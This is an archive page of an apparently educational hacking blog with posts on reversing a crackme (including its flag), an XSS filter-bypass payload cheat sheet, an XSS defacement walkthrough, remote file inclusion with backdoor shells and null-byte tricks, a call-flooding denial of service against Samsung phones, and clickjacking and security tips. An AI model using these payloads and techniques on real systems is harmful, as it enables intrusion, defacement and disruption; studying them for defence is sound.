Showing posts with label Ethical Hacking. Show all posts
Showing posts with label Ethical Hacking. Show all posts

Friday, June 21, 2013

Beating an SEH/VEH based Crack me through analysis

In this article , I will try to show how to beat an advanced crackme that is using an interesting way to calculate the length and it’s generating exceptions to be dealt with in order to return values into 32-bit registers such as EAX register , the key to beat a crackme is deep analysis through what it does under the hood especially when it’s using mixed methods to confuse,stop or slow the reverser.

This Crackme was taken from a very popular challenge website that I will not mention , I edited the strings printed in the interface in memory not to spot the website . I was also the 16th person to validate it (Validation rate 1%).

Let’s start by opening the CrackMe and see what it’s waited from us to do !!

It asks us politely to type a pass or to Crack it I guess.

Open your mind and carry on . Now we need to take a quick look on what routines are exactly dealing with the user input . Let’s switch to Immunity and take a quick look.

You can see that it is taking a user input then calling an address specified by EBX register after that it’s deciding whether printing the success or fail message. We are now interested in what’s directly going after getting the user input using scanf so let’s see what EBX holds and step into that call.

EBX isn't taking us farther but just below this code a little bit. The instructions which EBX will take us to are the ones responsible for checking the user input and deciding whether it’s right or not. The responsible routine is a little bit long and it’s split into 4 main parts each part ends with a JE (Jump If Equal) instruction. So let’s take care of each part alone :

1st Part – Checking the length :

Here are the instructions :

We can see that DEADBABE will be added to 227A65DD which will make ESI holding the memory address that specifies the user-input, then the next instruction will try to set the CarryFlag which is already set , the next instruction that may attract your attention is at address 00CC109D this is the address that will actually calculate the input string length . How did I know it ? I will explain.

You can see that the value 400 is moved to ECX , you can also remark that 227A69D9 is moved to EDI then EBX is added to it , the result will be stored at EDI for sure. Before the ADD instruction we have a VERY important instruction which is SALC , this instruction will Set the AL value to FF if the CF is set or to 00 if the CF is cleared . In our case CF is set , so the value of AL will be FF , this value is very important because the SCASB instruction will try to find all bytes that aren’t matching AL starting at ES:[(E)DI] . In addition, here we have the REPE instruction that is accompaigned with the SCASB instruction so it will try to use the ECX register to specify a search « array » , you can clearly see that ECX register was set to 400.

Now , go and check what EDI is holding after the ADD instruction you will see that it’s holding the value 00CC2497 . Follow this value in dump and you will find yourself in front of a bunch of «FF » , you see now that ECX holds the value 400 , this means that the search array will go to zero in other words and in theory the search will end when ECX will hold the value 00000000 , which make us figure out that the instruction will search for the first value that is different from « FF » from 00CC2497 until ( 00CC2497 – 400 ) = 00CC2097 and if no different values from FF were found ECX will just hold 00000000 . When following 00CC2097 in dump you will find what follows :

Here, the REPE SCASB instruction will stop in the last highlighted NULL byte in blue « 00 » because it is different from « FF » here ECX will hold the length from 00012097 until the value before the null byte. In my case here (input 123456) ECX will hold the value 9 because we should begin the counting from 0 then 1 then 2 until reaching 9 means reaching 000120A0.

Now that we know how the length is calculated we should figure out what length this crackme needs. In this phase we don’t care about if the serial is right or not because we just want to get through the first condition in a right way. You can see in the last two lines that we will subtract 0F from ECX then Jump if ZF=1 or not jump if ZF=0 , in other words if the ECX = 00000000 after the
subtraction the ZF will be set if not it will still equal 0. So basically after the REPE SCASB instruction ECX should hold 0F which equals 15 in decimal . So we just need to insert a string with 12 character length and he jump will be taken 

2nd Part – First 4 bytes of the flag :

As the conditional jump was taken you will fall directly into the second instruction which is LODS DWORD PTR DS:[ESI], this instruction will basically load the DWORD DS:[ESI] value into EAX register this value should be the first 4 characters that we wrote in our flag in decimal and also converted to little endian so if the first 4 characters that you entered were 1234 then EAX should hold after this instruction 34333231. After that we see that a DWORD is moved to EDX then EAX is Xored with it , this is almost the same case that I coded in CrackMe#3 at Hackathon Challenge . The right value of EAX after xoring it with EDX should be 1608030E so the first DWORD of our flag is 1608030E Xored with EDX . Which will give you that value : XOR 1608030E, 5A643059 = 4C6C3357 you will just have to convert it to big endian and you will have the first 4-bytes of the flag : 57336C4C which is « W3lL » in ASCII.

Now just type W3lL and type 8 random characters after it and you will see that ZF
will be set after the compare and the jump will be taken.

3rd part – Second 4-bytes of the flag (SEH) :
The 2 first parts were fun , now more . Let’s see the instructions :

Like the last part, we will fall directly into the second instruction which will move a DWORD from memory to EBX register , after that a substruction of 1000 will be done to EBX which will carry now 00CC1530 . This adress is the new adresse of the exception handler which will be set in a while , EBX will be pushed then the new exception handler will be completely created when moving ESP into DWORD PTR FS:[0] . After that the second 4 bytes of the user-input will be placed into EAX
register in little endian format , then a value that will xor EAX is moved into EBX.

Here where the TRAP is : the « INT 1 » instruction.

 We can see here that when we will step over this instruction using « F8 » the EIP will just hold directly the adresse 00CC10DF , so we don’t have to step over this instructions but let run normally the crackme as it was executed outside a debugger
. Basically the INT 01 instruction is called single-step break it will run after each instruction if the TrapFlag is set . Nevertheless, here it’s invoked directly inside the code and the TF is cleared which will generate an exception and never set the TF. Let me explain to you what is exactly happening when the « INT 1 » is passed through in normal execution and not by single stepping through it , keep in mind that this INT instruction will generate an exception that will be handeled by the SEH
newly created . Basically when we will trigger this interrupt the processor will go into the 1st location in the Interrupt Vector Table which starts in memory location 0x00 and ends at 0x3FF simply because interrupts can take a number which is between 0 and 255. After that the IP will be saved and also the CS , this basically will store 4 bytes (IP = 2 bytes & CS = 2 bytes) , before the interrupt will hand back the flow of execution to the program normally it will return using an « iret »
instruction . Here the IMPORTANT PART that the CS:IP and all FLAGS are restored again.

So basically when the instruction PUSH EBX at 00CC10C6 is executed it will indicate the current SE Handler which means the instructions that will deal with an exception , the exception here is triggered by the « INT 1 » instruction and the execution flow is moved directly into 00CC1530 , after returning the exception will be handeled and the execution flow will continue normally . The only thing you need to do is just set a breakpoint on the instruction after the « INT 1 » instruction
because the EIP will be incremented by 2 and it will skip that instruction. After we will return from the Exception handling routines we will see that EAX will hold a return value that is ADDed to the previous value that was held by EAX.

Now let’s work on finding that god damn second part of the validation flag. Pretend that I didn't say that the return value stored in EAX isn't added to its previous value so here you can just see after stepping over the « INT 1 » that the value of EAX will change. So we need to figure out if the EAX holds an address that have been moved , added or subtracted to it. In order to do it let’s rerun our Crackme inside a debugger for sure . Now we will enter this input for example : W3lL11119876 the
DWORD that will be treated in this part is 31313131 (111 in ASCII) so let’s step over the LODSD instruction and you will see that EAX is filled now with 31313131. As I said previously , you have to set a bp at 00CC10DD then step over it using <shift + F8> BUT we don’t want to do that now because this will make the value of EAX change and we will need to figure out what arithmetic operation is done when the value that is returned by interrupt will be Moved , added , subtracted ,
multiplied by the current value of EAX. So here what I've done is that I went and edited the value of EAX just before executing the interrupt to NULL , EAX =00000000 So I will not need to brute force each arithmetic operation if it’s an ADD so EAX will hold a value if it’s a multiplication EAX will still hold 0 , division either 0 or an exception ... etc

So , after executing the Interrupt I realized that EAX holds the value 21486553 , let’s covert this to big endian and to ASCII cause it’s printable =) ... we will finally have 53654821 = SeH!

If you want to be more sure if the operation is an addition just go and change EAX to 00000001 and you will get 21486554 which is in big endian + ASCII : TeH! .

Ok so now after we knew what is the value returned by the interrupt we must know what is the right value that EAX should hold before the XOR instruction. That’s simple , we see that EAX is compared to 18D386D7 after being Xored and it’s Xored with 495F4265 , so just before the XOR and just after « INT 1 » EAX should hold : 518CC4B2 (Xoring 18D386D7 with 495F4265) . Okey now we found what value EAX should hold just after the « INT 1 » instruction and we know that after the interrupt 21486553 is added to EAX register . Sooo the right value of EAX after the LODSD instruction is 518CC4B2 – 21486553 = 30445F5F int big endian 5F5F4430 and in ASCII : __D0 . So now the 8 first characters of the flag are W3lL__D0 . Let’s try to rerun the crackme and enter this serial : W3lL__D09876 . By stepping throught instructions until the Jump if equal in this part (don’t forget the bp) , you will see that the ZF will be set and the jump will be taken simply because the comparison went true and those 4 bytes are the correct ones.

4th part – The last 4 bytes of the flag (VEH) :
Here are the instructions :

We can see from a general view that these instructions are building a Vectored Exception Handler (VEH) which will deal with an exception executing a routine present at the instruction pointed by EBX , pushing a second Nonzero argument indicates that the VEH is inserted into the very head of the list then it’s Removed after executing a bunch of instructions that will check how is the last DWORD of the user-input is correct , those instructions are containing an exception at adresse

But first what is a Vectored Exception Handler . According to MSDN :
– Vectored Exception Handling is new as of Windows XP.
– All information about VEH are stored in the Heap.
– Vectored exception handlers are explicitly added by your code, rather than as a
byproduct of try/catch statements.
– Handlers aren't tied to a specific function nor are they tied to a stack frame.

So basically to be sure that an excpetion is trigerred and dealed with we have to put a breakpoint on the first instruction that is executed by the VEH which will be the EBX register pushed adresse for sure. While running the code we will see that the last DWORD is loaded in little endian format again into EAX register then a value is moved to EBX which is the value that we will use for Xoring. But just after this we have a MOV instruction which will move EBX to the current DWORD in the
memory location pointed by EBP , while stopping in that instruction you will see that EBP is holding the value 00000001 so an exception should be triggered as it’s impossible to move EBX to that location . If you put a bp on the pushed EBX in the stack you will see that the execution flow will be taken by the instructions at 00CC1960 (pushed EBX as an arg to create the VEH) . Those routines will handle this exception and return also a value to EAX register which will be added as
happened in the previous part of checking the flag. 

So we will need to figure out what is that added value again , all we need to do is to change the value of EAX register after the LODSD instruction to 00000000 then put a breakpoint on 00CC110D and press « F9 » so we don’t skip that instruction as happened last time. Now all we have to do is look at what EAX is holding : it’s holding D9150F32 . So after the handling the exception this value (D9150F32) will be added to EAX register , now we need to figure out what should be the right value of EAX just after handling the exception means : (D9150F32+ LastFlagDwordLittleEndian) 

You will just have to XOR 8E7632F3 with EBX , and you will have this value : FA3654A0 . So the right last DWORD of the flag in little endian should be :

FA3654A0 – D9150F32 =2121456E –> Big Endian = 6E452121 –> ASCII =nE!! 

So the last 4 characters of the flag are : nE!! ...

5 – Regrouping the 3 parts :

So the complete flag to validate the challenge is : W3lL__D0nE!!  Now just try to provide the flag to the Crackme and you will see that :

Finally , this was a really GOOD crackme that I actually enjoyed discovering and cracking because it uses many handlers to deal with exceptions then return some values that will be added and also uses a very interesting method to check for the length .

Author: The Article is submitted by Souhail Hammou (Dark-Puzzle) from  You can follow him here: &

Continue   Reading>>

Wednesday, January 23, 2013

10 System Admin Tools to Help You Secure Your Network

System admins are frequently bombarded with security concerns, requests, alerts, news items, “did you see this?!” emails, and more. Keeping up with all the aspects of network security can seem like an overwhelming task, but in this post we’re going to look at ten tools a system admin can use to help secure their network. Some you may be familiar with, like network security software, while others may come as a surprise, like your email client; but all will help you to stay ahead of the bad guys, keep yourself informed of the latest threats, and maintain the security of your network.

1. Network security software
When we talk about network security software, we’re talking about a class of product more than any specific tool, and how important it is for you to have an application or small group of applications that can help you to accomplish most of your tasks. There are simply too many things for any one admin to do by hand, and network security software applications help to automate the heavy lifting and ensure that you can keep up with the workload. Look for network security software that multitasks. Think about it as a Swiss Army knife of software packages that includes many of the other items on this list.

2. Vulnerability scanner
A good vulnerability scanner is a key part of any toolkit, and should be used by server admins and security engineers alike. The top network security software apps will include a scanner that has a database of the thousands of vulnerabilities that could exist on your network, so that you can quickly, easily and regularly scan your network to ensure you systems are up-to-date, configured properly and secured.

3. Port scanner
A port scanner is another regular tool that should be in your network security software application. Attackers regularly scan your Internet connection looking for ways in and so should you. But you should also scan internally so you can find unauthorized services or misconfigured systems, and to validate your internal firewalls are set up correctly.

4. Patching software
Patching operating systems and third party applications is one of the most important, regularly recurring tasks a sys admin has. Network security software that can automate this, and handle the hundreds of other applications on your network, is the only realistic way you can keep up with this.

5. Auditing software
Auditing software may strike you as a strange recommendation at first, but consider all those apps you are trying to patch. How can you be sure you have no vulnerabilities on your systems if your users can install anything on your systems? How are you going to maintain licensing compliance if you don’t know who has installed what from \software? Network security software may also include software and hardware inventory components to help you stay informed and secure.

6. Secure remote clients
Telnet, older versions of PCAnyWhere and several of the web-based remote access apps that are out there all have a common issue - they’re not secure. Use SSH v2 or later for secure access to all CLI-based systems, and the most secure versions of Remote Desktop Protocol to manage Windows boxes. Using strong encryption, good passwords, lockout policies and, when possible, mutual authentication between client and host, will help to ensure no one sniffs credentials or brute-forces their way into a system. If you have two-factor authentication in your environment, ensure that every system possible uses it to further reduce your risk from unauthorized access.

7. A good network analyzer
Whether you like the open source WireShark, the free Microsoft tool NetMon, or one of the many other commercial network analysis tools, having a good “sniffer” is key to helping secure and analyze systems. There is simply no way that’s more effective to figure out just what is going on between networked systems than to see the traffic first hand.

8. Network tools
Whenever you are dealing with connections from foreign systems, you will find the need to check network addresses, routes and more. Having good tools like DIG, WHOIS, HOST, TCPING and others close at hand makes network evaluation a breeze.

9. Log parsing software
Securing systems means going through logs; lots of them. Web logs, access logs, system logs, security logs, SNMP logs, syslog logs – the list goes on and on. Having software that can quickly and easily parse through logs is critical. Everyone has their favorite. Some install locally like LogParser, while others run on servers like Splunk. Whichever you prefer, get a good log parser to help wade through what can be millions of entries quickly and easily so you can find events you need to check.

10. Your email client
Knowledge is power, and the best way to amass that knowledge is to stay informed. Whether you subscribe to email bulletins, security alerts, or RSS feeds, your email client can provide you the first indications that something new is out there, and also what you need to do to protect your systems from the threat. Zero day exploits, out of band patches, best practices and more, can all be yours if you simply join the right distribution lists and subscribe to the right lists.

These 10 system admin tools are a great start towards building your toolkit for security. Network security software plays a major role in this toolkit, which you supplement with other tools and the information you need to maintain a secure environment.

This guest post was provided by Emmanuel Carabott on behalf of GFI Software Ltd. Learn more about the importance of a secure business network by downloading the free eBook: A first aid kit for SysAdmins. All product and company names herein may be trademarks of their respective owners.
Continue   Reading>>

Tuesday, February 28, 2012

XSS attacks practical examples ~ Cross site Scripting Exploits

Hello BTS readers,  So far i explained about XSS attacks and risks of this vulnerability; also i have provided guide to setup your own pentesting lab(using dvwa) to practice XSS attacks.

Dvwa is limited to few xss methods.  You may curious to know more about the practical examples for the XSS attacks. eHackingNews will help you to know more about the latest XSS attacks.

The XSS Vulnerability section in the EhackingNews covers the latest XSS attacks submitted by Security Experts and GreyHat hackers. This will give you an idea about the xss attack.

Continue   Reading>>

Tuesday, February 7, 2012

Complete Cross site Scripting(XSS) cheat sheets : Part 1

I am just providing this XSS Cheat sheet after collecting the exploit-codes from hackers' techniques and different sites especially .  This is complete list of XSS cheat codes which will help you to test xss vulnerabilities ,useful for bypassing the filters.  If you have any different cheat codes , please send your code.

Basic XSS codes:






When inside Script tag:
‘; alert(1);

Bypassing with toggle case:
  <IMG SRC=jAVasCrIPt:alert('XSS')>

XSS in Image and HTML tags:
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
 <IMG SRC=javascript:alert('XSS')>      

<img src=xss onerror=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"

<iframe src= <

Bypass the script tag filtering:






Using String.fromCharCode function:
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>


You can combine the above mentioned codes and make your own cheat code.

We are extending the cheat sheet.  Soon we will publish the part 2.

Continue   Reading>>

Saturday, January 21, 2012

Complete Cross Site Scripting(XSS) Guide : Web Application Pen Testing

Hello BTS readers, Here is complete set of posts that explains everything about the Cross site scripting.  Still more articles are on the way, Stay tuned to BreakTheSec..!

Link To Tutorials:
PenTesting Lab to practice XSS attacks:
Continue   Reading>>

Saturday, December 31, 2011

How to deface website with Cross Site Scripting ? : Complete XSS Tutorial

This is my third article about Cross site Scripting Tutorial. Last time, i explained how to do vulnerability test for XSS and some filter bypassing technique. Now let us see how a hacker deface a website with XSS vulnerability?

Never implement this technique. I am just explaining it for educational purpose only.

Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it's bad idea..!

Script for chaning the background Color of a website:

Script for chaning the background image of a website:

Defacement Page with Pastehtml:
First of all upload some defacement page(html) to and get the link.

When you find a XSS vulnerable site, then insert the script as :

This script will redirect the page to your pastehtml defacement page.

Note: You can deface only persistent XSS vulnerable sites.
Continue   Reading>>

Sunday, December 25, 2011

Set up your own Lab for practicing SQL injection and XSS : Ethical Hacking

I hope you learned about the Sql injection and XSS from BTS.  But you may curious to practice the SQLi and XSS attacks. we know that doing the attack on third-party website is crime.  So how can we do the practice? Here is the solution for you friends. Why shouldn't set up your own web application ? Yes, you can setup your own Pen Testing lab for practicing the XSS and SQLi vulnerabilities.

When i surf in the internet, i come to know about the  "Damn Vulnerable Web App (DVWA)".  It is one of web application that used for practicing your Ethical hacking/Pen Testing skills in legal way.

Download this web Application from here:

For Installing the this application, you will need XAMPP server.

The installation procedure :

Using this application , you can also practice:

  • LFI /RFI (File Inclusion methods)
  • Command Execution
  • Upload Script
  • Login Brute Force
if you have any doubts, check their wiki page or comment here.
Continue   Reading>>

Thursday, December 15, 2011

Introduction to Vulnerability Assessment

What is Vulnerability Assessment? 
Vulnerability Assessment is the process that identifies and classifies the vulnerability in a system. The vulnerability are performed in various systems such as IT systems,nuclear power plants, water supply system,etc. Vulnerability from the perspective of disaster management means assessing the threats from potential hazards to the population and to infrastructure. It may be conducted in the political, social, economic or environmental fields.

The steps involved in Vulnerability Assessment:

  • Classifying capabilities and assets(resources) in a system.
  • Assigning quantifiable vaule and importance to the above resources.
  • Identifying the vulnerability in each resources.
  • Mitigating or eliminating the most serious vulnerabilities for the most valuable
  • resources

Standard risk analysis is mostly interested in exploring and examining the risks surrounding a given asset or resource (in the IT industry's case, digital information, the continued smooth operation of a program, or the unimpeded performance of an OS or network) as well as its function and design. Such assessments tend to concentrate on the direct consequences and root causes for the failure of the scrutinized object.

In contrast, vulnerability assessment is more concerned with both the adverse effects on the asset itself and on the principal and secondary consequences for the surrounding system environment. At any rate, this analysis type is mostly focused on the possibilities of mitigating such risks and improving the security capacity and performance rating of a given network or computer system in order to better manage future incidents.

The vulnerability test is performed by an automated tools(Eg: joomla vulnerability scanner). These tools identify the vulnerabilities and give tips for mitigate or patching . But these tools are limited to common and known vulnerabilities. Vulnerability assessment can be done by inside professionals (i.e. network administrators), but is usually outsourced to Managed Security Service Providers (MSSP).
Continue   Reading>>

Wednesday, November 16, 2011

Self-XSS (Cross Site Scripting) ~ Social Engineering Attack and Prevention

Last time , I have explained about the Clickjacking attack and prevention.  Today,  i am going to explain about the Self-XSS(Cross Site Scripting) Attack

What is Self-XSS?
Self-XSS is one of the popular Social Engineering Attack used by Attackers to trick users into paste the malicious code in browser.  Results in attacker accessing to the whatever website you visit. Usually scammers use this attack for tricking users to buy products or get money through online survey .

Recently, Hackers Attacked Facebook with explicit hardcore porn images. Facebook says it might be self-Xss Attack .

Javascript can be executed in browser url bar.
For example , enter the following code in your browser:
This will show a pop up box with "BreakTheSecurity".  An attacker can use this for malicious purpose. He can steal Confidential data, cookies, redirect to malware sites and more.
For Eg:
Entering the following code will display the cookies in your browser:
javascript:alert("Cookies:"+document.cookies+"  "+"\n By \n BreakTheSecurity");

The above code is not going to anything maliciously other than displaying the cookies.  But an attacker can extend the script so that it can take advantage your data.

Security Tips from BreakTheSecurity:
  • Use NoScript add on that will prevent javascript running in your browser.
  • Don't click the shorthand urls for Example:  This may redirect to an infected sites. 
Aware of Social Engineering:
  • If anyone ask you(even if he is your friend) to paste the scripts in browser bar, Never do this mistake.  
  • If anyone says "Iphone only $10", Don't eager to click it. 
  • If anyone says "1000 shares will cure a baby", Never do this mistake. Facebook shares never help to get money or help to cure baby.
  • Read our EHN spam report to know the latest updates about the facebook scams.
God give us the Sixth Sense,Use it and think before you click any links or following the other instructions. 
Continue   Reading>>

Sunday, November 13, 2011

Remote File Inclusion Vulnerability Tutorial ~ Web application Vulnerability

Remote file inclusion(RFI) is a critical vulnerability caused by insufficient validation of user input passed to the web application.  The RFI vulnerability allows attackers to load remotely hosted malicious file such as a backdoor shell.

Vulnerable Code
Let us say a webpage called "RFI.php" that loads a code from external file using 'filename' parameter.

In the above screenshot, the RFI.php file loads the code from 'news.php'.

HTTP request:

Let us check the PHP code of RFI.php :

The include() function gets the all code/text from the specified file(news.php) and copies it into the current file(rfi.php).

Content of news.php file

As you can see the developer didn't validate the 'filename' and passed it directly to the 'include' function.  It results in Remote File inclusion vulnerability. 

Testing the Vulnerability:
Let us test whether the application is vulnerable to Remote File Inclusion by passing "" as filename parameter to the webpage.

HTTP request:

Hurrah, it successfully loaded the content from the :) It means the page is vulnerable to RFI :D

Exploiting the vulnerability:
A hacker with malicious intent can load a backdoor shell.  The backdoor shell allows the hacker to compromise the entire web server.

For Example:

Using this shell, now an attacker is able to do anything in the server.  For instance, he can delete index.php file.

Example 2:

In most of the web applications, the filename is passed as parameter without the extension(.php).

For example:

Code of RFI.php:
As you can see in the above code, the ".php" extension is appended to the filename in the PHP code.   

So, if we pass "shell.txt", then the filename will become "shell.txt.php", results in an error.

To avoid this error, you can use Null Byte.  Null byte(%00) indicates the end of the string. The strings following the null byte will be ignored.

We can enter the null byte at the end of our filename to ignore the ".php" string.


If You would like to test how a remote file inclusion attack works, you can just download our Vulnerable app "BTS Pentesting Lab" from here:

In case, you would like to see the real world examples, Here is list of Vulnerability reports:

 How to Prevent Remote File Inclusion vulnerability
  • Disable the 'register_globals' and 'allow_url_fopen' and 'allow_url_include' in PHP.ini file.  In latest version of PHP, they have been turned off :) so no need to worry now.
  •  Validate Users' Input.
    Continue   Reading>>

    Friday, November 11, 2011

    Shield Against Hacking With a Daily Anti-Malware Scan

    Hacking; it's the fear of every website owner and it keeps many online business owners up at night, checking their website and servers, making sure they are still in control. It's scary, one day you are doing well and selling products, the next, you can't log into your website, you have profane images instead of product images, and you are being a virus spreader that most search engines block and that most browsers will keep visitors from getting to. This can take years to recover from, even after the virus is gone, but there is hope. Malware often take a while to really get into the system and cause damage, and like with a human virus, if it is stopped early you will not encounter these terrible effects.

    What is hacking?
    Hacking is a large culture that has a large number of methods and attacks to get around your security, sneak into your website and server, and change everything around. There are many ways of doing this, but it is commonly done through malware that is designated to consume files and strike at an inopportune moment.

    The problem about this is that, until the virus strikes, you may not know anything is happening. Just like a human virus, it is consuming files (like cells) and will manifest effects when it is already too late. By the time you notice that you cannot login, or that weird things are happening on your website, it's already too late. You have been taken over, and there are many disastrous effects to this.

    The most direct effect is that your website is ruined. Well, that can be fixed easily enough. The real trouble is your private information. Do you have any credit cards, passwords, private business files and other classified information that only your or other associates should see? Hacking is a common form of corporate espionage, which is why you may be targeted.

    If you have 10+ years in Internet security, maybe you can handle this by yourself; however, most website owners do not have this experience. Instead, you can use computer support Sydney daily malware scans. What does this do for you? Everyday, the computer support Sydney company will scan all your website files for malware. Since the malware typically needs several days or longer to really affect the website, this allows you to get rid of the malware before you see anything happen.

    Another benefit to a daily malware scan is that most of the infected code or file can be metaphorically sanitized, leaving you with a clean website free of digital germs. Not only that, but this malware scanner is updated daily with new malware formats, methods and strategies that hackers think up. Think of this as a doctor who learns more and more about his field, just this works much faster.

    This can also easily scale up from beginning websites to enterprise sized monoliths. So if you are worried about size, either because you have a small or large website, don't even let that be a concern. Your entire website can be easily scanned and searched for malware, which will then be prompted removed so you can enjoy the freedom of a clean website without viruses.

    No website, especially a business website, can live a successful online life without daily malware scanning. Hackers come in for fun to destroy websites with weak code, and corporate espionage will target any competitors that do not have appropriate online security. Don't be another hacked website, don't fall to this devastating online virus. Use a daily malware scanner, and keep those nasty germs away from your precious website.

    Jacob Pettit
    Marketing, GO8

    Continue   Reading>>

    Tuesday, November 8, 2011

    DoS (denial of service) attack on Mobile phones

    As we are in this world influenced by information security, we as security professional have seen many kind of Dos and DDoS attacks happening around the world but what if any one DoS your daily communication Companion ? your mobile device ? and you are just unable to call or operate your phone in proper way ,not even listen to music or even videos ??

    Some years back there was DoS possible on a Nokia Phone back in around 2003. but now there is a new way (at least i think so) for performing DoS attack on a Samsung Mobile Phone. Because of auto call reject functionality of the Samsung phones.

    Auto call Reject functionality : this function of the Samsung phones is used to block any number to call u so when a person adds any number like xxxxxxxxxx to reject list and if xxxxxxxxxx calls that person ,so the call is automatically gets disconnected , and that number xxxxxxxxxx can not connect a call with you.

    Example : if Bob has a Samsung mobile phone and if Bob adds Mak's mobile number to is auto reject list , so when Mak calls Bob it call gets disconnected in first call ring and Bob has just a missed call alert of Mak's call.

    Its a nice function of Samsung mobile phones to block unwanted callers but as by the example the rejection function reject call but it shows a missed call alert of that blocked number. This is the main flow (Bug) which allow the DoS happening on the Samsung mobile phones.

    Lets take the above example again , Mak's mobile number is in reject list of Bob's Samsung phone so when Mak calls Bob his call ends immediately and with a missed call alert on Bob's phone but if Mak calls Bob in a rate of just a few seconds then ?? - than it performs a DoS on Bob's Samsung mobile phone so if Mak calls Bob in seconds again and again by his phone's auto redial function than bob is unable to receive any on else calls because its going to show busy to that other caller calling Bob. even Bob can not do calls , can not listen to music ,videos or even capture photos because the phone continuously shows missed call alerts of Mak's calls.

    It happens because of the missed call alert which takes long to go from the screen on the phone. so if Samsung adds a function like some Chinese phones - they just don't show any alert on the mobile screen and shows entries of blocked calls.

    Anyone can just give missed calls to that mobile number for some time so when the user of that Samsung mobile phone adds the number to auto reject list than u can register on mobivox or similar service and just write a Autoit3 script or similar to give missed calls to the person to its a DoS on his Samsung Mobile.

    Author : Ashish Mistry, Founder of Hcon
    Information Security Researcher, Penetration Tester, Malware Researcher, Trainer

    Continue   Reading>>

    Friday, November 4, 2011

    Find If A Website Is safe To Open or not using Online sites and Tools

    In last post, we explained how to check if the site is safe or not using the McAfee Advisor.  Now i am going to introduce some other sites and tools for testing the site is safe to open or not.

    Websites To check sites:

    Norton Safeweb:
    Norton Safeweb is free online application provided by Norton Security. It works same in way as McAfeeAdvisor.
    You can check the site safety here:

    Google Safe Browsing:
    Google safe browsing will analyze the site for malware.  It will also report the status of site in past months.
    URL to Check:
    replace the with your target site.

    If you manually find any sites spreading malware, you can report here:

    AVG Link Scanner:
    AVG Link Scanner is free tool that also works like a McAfeeAdvisor.

    • Checks each web page in real time before it opens on your computer
    • Automatically updates whenever a new threat is discovered 
    Download it from here:

    Don't forget to check your own site frequently. Attackers can inject malicious script in your site also.
    Continue   Reading>>

    Thursday, November 3, 2011

    What is Clickjacking Attack? How to Prevent? | UI Redressing

    Will answering simple maths quiz delete your Social Network account?  If your answer is "No", then check this news Linkedin Clickjacking Vulnerability and come back.  Will visiting a website turn on your webcam? The answer is "Yes".  Check this Flash player clickjacking vulnerability.

    If you read above news completely, It will be easy for you to understand  what is clickjacking.  Ok, lets continue to our Article.
    Clickjacking also known as UI Redressing,is one of Malicious Technique tricking users to click the button/image that will run hidden malicious script from another site.
    An attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the innocuous page. Thus an attacker hijack the click to another website.  That's why it is known as Clickjacking(Click+Hijacking).  The term "clickjacking" was coined by Jeremiah Grossman and Robert Hansen in 2008.

    Lets take the real time example "Linkedin clickjacking vulnerability.
    The above image may look like simple maths problem.  Once you click the submit button, it will delete your Linkedin account(if you are logged in) without asking any questions.

    Clickjacking Attack can be used for:
    • Tricking users to turn on their webcam and microphone using this adobe vulnerability (this security flaw fixed by adobe)
    • Getting more Twitter Followers
    • Post in your facebook wall.
    • Can delete your profile.

    Prevention Techniques:

    Client Side(Security tips for users):
    Flash Player:
    Update your Flash Player(old version are vulnerable to Clickjacking). 

    Browser Security Addons: 
    Noscript is Mozilla add on that provides protection against clickjacking,XSS and other malicious scripts.  Noscript is available for mobiles also.

    Comitari Web Protection Suite: Comitari provides client side protection against ClickJacking (aka UI Redressing) attacks. Installed as browser add-on

    GuardedID: It is a commercial product which provides client-side clickjack protection for users of IE or Firefox without interfering with the operation of legitimate iFrames

    Server Side( For Developers)
    Frame Killer:
    Framekiller is javascript snippet that can be used in webpage  to avoid inserting frames from different sources.  This can provide security against frame based clikjacking.
    Continue   Reading>>

    How to Hide email address when sending mail to Multiple Recipients

    Recently, i got mail from my Institute(where i learned Java) regarding the Interview. when i look into the To address, it includes other email address (including girls email address).  This is not big matter when you send mail within organization. What if suppose you send to others.

    Just for fun:
    Just imagine you have two girl friends.  Forwarding some interesting mail to both.  If anyone notice the To address, then you will end up in hospital. 

     If you like to hide email address from other recipients while sending to multiple recipients, this article will explain how to do.  I believe this will helpful for organization and those who concerned about Security.

    How to do?
    It is very simple.

    Whenever you send mail to group of mails, fill the mail address in BCC field instead of To field (leave the To field empty).

    BCC is expanded as Blind Carbon Copy.

    The receiver will see sender and his address.
    He can't see others address.
    Continue   Reading>>

    Wednesday, November 2, 2011

    Could Your Bad Password Habits Come Back To Haunt You?

    According to Business Insider, the CEO of a major social network used its trusted database of user passwords in order to hack into one of its user’s email accounts. The hack was based on the guess that this user probably accessed all of their accounts using the same password.

    Although the cloud has provided us with some amazing new tools, it’s also created the need for increased end-user education and policy enforcement.

    Yes, it’s true that nearly all cloud providers act ethically. They invest heavily in security as a means of protecting their reputations. But also, there are laws which strictly dictate how they must handle and protect their client data.

    In fact, most data leaks and privacy breaches are the result of “insider jobs” by people who had physical access to the victim’s computer or storage media. (It would be much easier for me to steal your laptop from your home, than for me to break into Google’s datacenter and steal the hard drive that stores your Gmail content).  But it only takes one bad apple or one security leak to put your password into the wrong hands. And once that happens, then all of the other accounts which depend on this password will be compromised.

